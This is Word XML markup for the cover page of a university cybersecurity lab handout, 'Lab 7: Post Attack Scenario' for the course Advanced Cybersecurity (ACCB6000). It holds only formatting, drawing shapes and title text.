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9789D3" w14:textId="60D538D2" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText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86784" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E0D77BB" wp14:editId="73DF83EE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>47625</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9773285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7505065" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="105" name="Lin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050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848D11" id="Line 82" o:spid="_x0000_s1026" style="position:absolute;z-index:-16029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.75pt,769.55pt" to="594.7pt,76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">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F3938" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="149303D2" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:line="381" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15732224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75B72689" wp14:editId="0E4E3B4D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>453390</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-362075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2746373" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1" name="image1.jpeg" descr="C:\Documents and Settings\qlt-aj\Local Settings\Temporary Internet Files\Content.Word\TSD_swan2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6373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Applied Computing Wales Institute of Science and Art (WISA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67064709" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E00380" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF34089" w14:textId="326F8E26" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="2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6A45B13E" wp14:editId="605B87A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1287780</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>197485</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5815330" cy="1758315"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="99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15330" cy="1758315"/>
                          <a:chOff x="2028" y="311"/>
                          <a:chExt cx="9158" cy="2769"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="100" name="Text Box 81"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="3482" y="2386"/>
                            <a:ext cx="4960" cy="3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BC4483C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                              <w:pPr>
                                <w:spacing w:line="388" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Verdana"/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rFonts w:ascii="Verdana"/>
                                  <w:b/>
                                  <w:sz w:val="32"/>
                                </w:rPr>
                                <w:t>Lab 7: Post Attack Scenario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1" name="Text Box 80"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2930" y="311"/>
                            <a:ext cx="6068" cy="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8EA9F73" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                              <w:pPr>
                                <w:spacing w:line="401" w:lineRule="exact"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito"/>
                                  <w:b/>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Carlito"/>
                                  <w:b/>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t>Advanced Cybersecurity (ACCB6000)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2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28" y="454"/>
                            <a:ext cx="8235" cy="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3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04" y="1199"/>
                            <a:ext cx="882" cy="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4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78" y="1331"/>
                            <a:ext cx="523" cy="6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45B13E" id="Group 76" o:spid="_x0000_s1026" style="position:absolute;margin-left:101.4pt;margin-top:15.55pt;width:457.9pt;height:138.45pt;z-index:-15727616;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="2028,311" coordsize="9158,276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1" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:3482;top:2386;width:4960;height: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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0BC4483C" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                        <w:pPr>
                          <w:spacing w:line="388" w:lineRule="exact"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Verdana"/>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Verdana"/>
                            <w:b/>
                            <w:sz w:val="32"/>
                          </w:rPr>
                          <w:t>Lab 7: Post Attack Scenario</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 80" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:2930;top:311;width:6068;height:4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" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="08EA9F73" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
                        <w:pPr>
                          <w:spacing w:line="401" w:lineRule="exact"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito"/>
                            <w:b/>
                            <w:sz w:val="40"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Carlito"/>
                            <w:b/>
                            <w:sz w:val="40"/>
                          </w:rPr>
                          <w:t>Advanced Cybersecurity (ACCB6000)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9" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:2028;top:454;width:8235;height:2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">
                  <v:imagedata r:id="rId11" o:title=""/>
                </v:shape>
                <v:shape id="Picture 78" o:spid="_x0000_s1030" type="#_x0000_t75" style="position:absolute;left:10304;top:1199;width:882;height:9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">
                  <v:imagedata r:id="rId12" o:title=""/>
                </v:shape>
                <v:shape id="Picture 77" o:spid="_x0000_s1031" type="#_x0000_t75" style="position:absolute;left:6378;top:1331;width:523;height:6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">
                  <v:imagedata r:id="rId13" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF8523" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A3607D" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B96DE7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FBA3699" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CD52D7" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70EFD1FA" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5755C9" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2082E480" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5884CC3A" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799BC314" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6797D9B0" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478725DB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C41222" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF87872" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39317BF1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6C8DD0" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7189466B" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A5F5941" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EFD91E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A69512D" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655C2029" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4AA58E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CBDF833" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE79E88" w14:textId="60462D7D" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="23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0EAD812D" wp14:editId="66979544">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1247140</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>210185</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4966335" cy="490855"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="93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66335" cy="490855"/>
                          <a:chOff x="1964" y="331"/>
                          <a:chExt cx="7821" cy="773"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="94" name="AutoShape 75"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1964" y="330"/>
                            <a:ext cx="7821" cy="773"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 1973 1964"/>
                              <a:gd name="T1" fmla="*/ T0 w 7821"/>
                              <a:gd name="T2" fmla="+- 0 331 331"/>
                              <a:gd name="T3" fmla="*/ 331 h 773"/>
                              <a:gd name="T4" fmla="+- 0 1964 1964"/>
                              <a:gd name="T5" fmla="*/ T4 w 7821"/>
                              <a:gd name="T6" fmla="+- 0 1094 331"/>
                              <a:gd name="T7" fmla="*/ 1094 h 773"/>
                              <a:gd name="T8" fmla="+- 0 9776 1964"/>
                              <a:gd name="T9" fmla="*/ T8 w 7821"/>
                              <a:gd name="T10" fmla="+- 0 1104 331"/>
                              <a:gd name="T11" fmla="*/ 1104 h 773"/>
                              <a:gd name="T12" fmla="+- 0 9785 1964"/>
                              <a:gd name="T13" fmla="*/ T12 w 7821"/>
                              <a:gd name="T14" fmla="+- 0 1085 331"/>
                              <a:gd name="T15" fmla="*/ 1085 h 773"/>
                              <a:gd name="T16" fmla="+- 0 1983 1964"/>
                              <a:gd name="T17" fmla="*/ T16 w 7821"/>
                              <a:gd name="T18" fmla="+- 0 1063 331"/>
                              <a:gd name="T19" fmla="*/ 1063 h 773"/>
                              <a:gd name="T20" fmla="+- 0 2002 1964"/>
                              <a:gd name="T21" fmla="*/ T20 w 7821"/>
                              <a:gd name="T22" fmla="+- 0 372 331"/>
                              <a:gd name="T23" fmla="*/ 372 h 773"/>
                              <a:gd name="T24" fmla="+- 0 2002 1964"/>
                              <a:gd name="T25" fmla="*/ T24 w 7821"/>
                              <a:gd name="T26" fmla="+- 0 353 331"/>
                              <a:gd name="T27" fmla="*/ 353 h 773"/>
                              <a:gd name="T28" fmla="+- 0 9785 1964"/>
                              <a:gd name="T29" fmla="*/ T28 w 7821"/>
                              <a:gd name="T30" fmla="+- 0 341 331"/>
                              <a:gd name="T31" fmla="*/ 341 h 773"/>
                              <a:gd name="T32" fmla="+- 0 2002 1964"/>
                              <a:gd name="T33" fmla="*/ T32 w 7821"/>
                              <a:gd name="T34" fmla="+- 0 1063 331"/>
                              <a:gd name="T35" fmla="*/ 1063 h 773"/>
                              <a:gd name="T36" fmla="+- 0 2002 1964"/>
                              <a:gd name="T37" fmla="*/ T36 w 7821"/>
                              <a:gd name="T38" fmla="+- 0 1085 331"/>
                              <a:gd name="T39" fmla="*/ 1085 h 773"/>
                              <a:gd name="T40" fmla="+- 0 9744 1964"/>
                              <a:gd name="T41" fmla="*/ T40 w 7821"/>
                              <a:gd name="T42" fmla="+- 0 1063 331"/>
                              <a:gd name="T43" fmla="*/ 1063 h 773"/>
                              <a:gd name="T44" fmla="+- 0 2002 1964"/>
                              <a:gd name="T45" fmla="*/ T44 w 7821"/>
                              <a:gd name="T46" fmla="+- 0 1085 331"/>
                              <a:gd name="T47" fmla="*/ 1085 h 773"/>
                              <a:gd name="T48" fmla="+- 0 9744 1964"/>
                              <a:gd name="T49" fmla="*/ T48 w 7821"/>
                              <a:gd name="T50" fmla="+- 0 1063 331"/>
                              <a:gd name="T51" fmla="*/ 1063 h 773"/>
                              <a:gd name="T52" fmla="+- 0 9744 1964"/>
                              <a:gd name="T53" fmla="*/ T52 w 7821"/>
                              <a:gd name="T54" fmla="+- 0 1085 331"/>
                              <a:gd name="T55" fmla="*/ 1085 h 773"/>
                              <a:gd name="T56" fmla="+- 0 9785 1964"/>
                              <a:gd name="T57" fmla="*/ T56 w 7821"/>
                              <a:gd name="T58" fmla="+- 0 1063 331"/>
                              <a:gd name="T59" fmla="*/ 1063 h 773"/>
                              <a:gd name="T60" fmla="+- 0 9766 1964"/>
                              <a:gd name="T61" fmla="*/ T60 w 7821"/>
                              <a:gd name="T62" fmla="+- 0 372 331"/>
                              <a:gd name="T63" fmla="*/ 372 h 773"/>
                              <a:gd name="T64" fmla="+- 0 9785 1964"/>
                              <a:gd name="T65" fmla="*/ T64 w 7821"/>
                              <a:gd name="T66" fmla="+- 0 1063 331"/>
                              <a:gd name="T67" fmla="*/ 1063 h 773"/>
                              <a:gd name="T68" fmla="+- 0 9744 1964"/>
                              <a:gd name="T69" fmla="*/ T68 w 7821"/>
                              <a:gd name="T70" fmla="+- 0 1085 331"/>
                              <a:gd name="T71" fmla="*/ 1085 h 773"/>
                              <a:gd name="T72" fmla="+- 0 9785 1964"/>
                              <a:gd name="T73" fmla="*/ T72 w 7821"/>
                              <a:gd name="T74" fmla="+- 0 1063 331"/>
                              <a:gd name="T75" fmla="*/ 1063 h 773"/>
                              <a:gd name="T76" fmla="+- 0 2064 1964"/>
                              <a:gd name="T77" fmla="*/ T76 w 7821"/>
                              <a:gd name="T78" fmla="+- 0 422 331"/>
                              <a:gd name="T79" fmla="*/ 422 h 773"/>
                              <a:gd name="T80" fmla="+- 0 2055 1964"/>
                              <a:gd name="T81" fmla="*/ T80 w 7821"/>
                              <a:gd name="T82" fmla="+- 0 1003 331"/>
                              <a:gd name="T83" fmla="*/ 1003 h 773"/>
                              <a:gd name="T84" fmla="+- 0 9684 1964"/>
                              <a:gd name="T85" fmla="*/ T84 w 7821"/>
                              <a:gd name="T86" fmla="+- 0 1013 331"/>
                              <a:gd name="T87" fmla="*/ 1013 h 773"/>
                              <a:gd name="T88" fmla="+- 0 9694 1964"/>
                              <a:gd name="T89" fmla="*/ T88 w 7821"/>
                              <a:gd name="T90" fmla="+- 0 991 331"/>
                              <a:gd name="T91" fmla="*/ 991 h 773"/>
                              <a:gd name="T92" fmla="+- 0 2074 1964"/>
                              <a:gd name="T93" fmla="*/ T92 w 7821"/>
                              <a:gd name="T94" fmla="+- 0 972 331"/>
                              <a:gd name="T95" fmla="*/ 972 h 773"/>
                              <a:gd name="T96" fmla="+- 0 2096 1964"/>
                              <a:gd name="T97" fmla="*/ T96 w 7821"/>
                              <a:gd name="T98" fmla="+- 0 463 331"/>
                              <a:gd name="T99" fmla="*/ 463 h 773"/>
                              <a:gd name="T100" fmla="+- 0 2096 1964"/>
                              <a:gd name="T101" fmla="*/ T100 w 7821"/>
                              <a:gd name="T102" fmla="+- 0 444 331"/>
                              <a:gd name="T103" fmla="*/ 444 h 773"/>
                              <a:gd name="T104" fmla="+- 0 9694 1964"/>
                              <a:gd name="T105" fmla="*/ T104 w 7821"/>
                              <a:gd name="T106" fmla="+- 0 432 331"/>
                              <a:gd name="T107" fmla="*/ 432 h 773"/>
                              <a:gd name="T108" fmla="+- 0 2096 1964"/>
                              <a:gd name="T109" fmla="*/ T108 w 7821"/>
                              <a:gd name="T110" fmla="+- 0 972 331"/>
                              <a:gd name="T111" fmla="*/ 972 h 773"/>
                              <a:gd name="T112" fmla="+- 0 2096 1964"/>
                              <a:gd name="T113" fmla="*/ T112 w 7821"/>
                              <a:gd name="T114" fmla="+- 0 991 331"/>
                              <a:gd name="T115" fmla="*/ 991 h 773"/>
                              <a:gd name="T116" fmla="+- 0 9653 1964"/>
                              <a:gd name="T117" fmla="*/ T116 w 7821"/>
                              <a:gd name="T118" fmla="+- 0 972 331"/>
                              <a:gd name="T119" fmla="*/ 972 h 773"/>
                              <a:gd name="T120" fmla="+- 0 2096 1964"/>
                              <a:gd name="T121" fmla="*/ T120 w 7821"/>
                              <a:gd name="T122" fmla="+- 0 991 331"/>
                              <a:gd name="T123" fmla="*/ 991 h 773"/>
                              <a:gd name="T124" fmla="+- 0 9653 1964"/>
                              <a:gd name="T125" fmla="*/ T124 w 7821"/>
                              <a:gd name="T126" fmla="+- 0 972 331"/>
                              <a:gd name="T127" fmla="*/ 972 h 773"/>
                              <a:gd name="T128" fmla="+- 0 9653 1964"/>
                              <a:gd name="T129" fmla="*/ T128 w 7821"/>
                              <a:gd name="T130" fmla="+- 0 991 331"/>
                              <a:gd name="T131" fmla="*/ 991 h 773"/>
                              <a:gd name="T132" fmla="+- 0 9694 1964"/>
                              <a:gd name="T133" fmla="*/ T132 w 7821"/>
                              <a:gd name="T134" fmla="+- 0 972 331"/>
                              <a:gd name="T135" fmla="*/ 972 h 773"/>
                              <a:gd name="T136" fmla="+- 0 9675 1964"/>
                              <a:gd name="T137" fmla="*/ T136 w 7821"/>
                              <a:gd name="T138" fmla="+- 0 463 331"/>
                              <a:gd name="T139" fmla="*/ 463 h 773"/>
                              <a:gd name="T140" fmla="+- 0 9694 1964"/>
                              <a:gd name="T141" fmla="*/ T140 w 7821"/>
                              <a:gd name="T142" fmla="+- 0 972 331"/>
                              <a:gd name="T143" fmla="*/ 972 h 773"/>
                              <a:gd name="T144" fmla="+- 0 9653 1964"/>
                              <a:gd name="T145" fmla="*/ T144 w 7821"/>
                              <a:gd name="T146" fmla="+- 0 991 331"/>
                              <a:gd name="T147" fmla="*/ 991 h 773"/>
                              <a:gd name="T148" fmla="+- 0 9694 1964"/>
                              <a:gd name="T149" fmla="*/ T148 w 7821"/>
                              <a:gd name="T150" fmla="+- 0 972 331"/>
                              <a:gd name="T151" fmla="*/ 972 h 773"/>
                              <a:gd name="T152" fmla="+- 0 2074 1964"/>
                              <a:gd name="T153" fmla="*/ T152 w 7821"/>
                              <a:gd name="T154" fmla="+- 0 463 331"/>
                              <a:gd name="T155" fmla="*/ 463 h 773"/>
                              <a:gd name="T156" fmla="+- 0 2096 1964"/>
                              <a:gd name="T157" fmla="*/ T156 w 7821"/>
                              <a:gd name="T158" fmla="+- 0 444 331"/>
                              <a:gd name="T159" fmla="*/ 444 h 773"/>
                              <a:gd name="T160" fmla="+- 0 2096 1964"/>
                              <a:gd name="T161" fmla="*/ T160 w 7821"/>
                              <a:gd name="T162" fmla="+- 0 444 331"/>
                              <a:gd name="T163" fmla="*/ 444 h 773"/>
                              <a:gd name="T164" fmla="+- 0 9653 1964"/>
                              <a:gd name="T165" fmla="*/ T164 w 7821"/>
                              <a:gd name="T166" fmla="+- 0 463 331"/>
                              <a:gd name="T167" fmla="*/ 463 h 773"/>
                              <a:gd name="T168" fmla="+- 0 9694 1964"/>
                              <a:gd name="T169" fmla="*/ T168 w 7821"/>
                              <a:gd name="T170" fmla="+- 0 444 331"/>
                              <a:gd name="T171" fmla="*/ 444 h 773"/>
                              <a:gd name="T172" fmla="+- 0 9675 1964"/>
                              <a:gd name="T173" fmla="*/ T172 w 7821"/>
                              <a:gd name="T174" fmla="+- 0 463 331"/>
                              <a:gd name="T175" fmla="*/ 463 h 773"/>
                              <a:gd name="T176" fmla="+- 0 9694 1964"/>
                              <a:gd name="T177" fmla="*/ T176 w 7821"/>
                              <a:gd name="T178" fmla="+- 0 444 331"/>
                              <a:gd name="T179" fmla="*/ 444 h 773"/>
                              <a:gd name="T180" fmla="+- 0 1983 1964"/>
                              <a:gd name="T181" fmla="*/ T180 w 7821"/>
                              <a:gd name="T182" fmla="+- 0 372 331"/>
                              <a:gd name="T183" fmla="*/ 372 h 773"/>
                              <a:gd name="T184" fmla="+- 0 2002 1964"/>
                              <a:gd name="T185" fmla="*/ T184 w 7821"/>
                              <a:gd name="T186" fmla="+- 0 353 331"/>
                              <a:gd name="T187" fmla="*/ 353 h 773"/>
                              <a:gd name="T188" fmla="+- 0 2002 1964"/>
                              <a:gd name="T189" fmla="*/ T188 w 7821"/>
                              <a:gd name="T190" fmla="+- 0 353 331"/>
                              <a:gd name="T191" fmla="*/ 353 h 773"/>
                              <a:gd name="T192" fmla="+- 0 9744 1964"/>
                              <a:gd name="T193" fmla="*/ T192 w 7821"/>
                              <a:gd name="T194" fmla="+- 0 372 331"/>
                              <a:gd name="T195" fmla="*/ 372 h 773"/>
                              <a:gd name="T196" fmla="+- 0 9785 1964"/>
                              <a:gd name="T197" fmla="*/ T196 w 7821"/>
                              <a:gd name="T198" fmla="+- 0 353 331"/>
                              <a:gd name="T199" fmla="*/ 353 h 773"/>
                              <a:gd name="T200" fmla="+- 0 9766 1964"/>
                              <a:gd name="T201" fmla="*/ T200 w 7821"/>
                              <a:gd name="T202" fmla="+- 0 372 331"/>
                              <a:gd name="T203" fmla="*/ 372 h 773"/>
                              <a:gd name="T204" fmla="+- 0 9785 1964"/>
                              <a:gd name="T205" fmla="*/ T204 w 7821"/>
                              <a:gd name="T206" fmla="+- 0 353 331"/>
                              <a:gd name="T207" fmla="*/ 353 h 7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7821" h="773">
                                <a:moveTo>
                                  <a:pt x="7812" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="9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763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="773"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7812" y="773"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7821" y="763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7821" y="754"/>
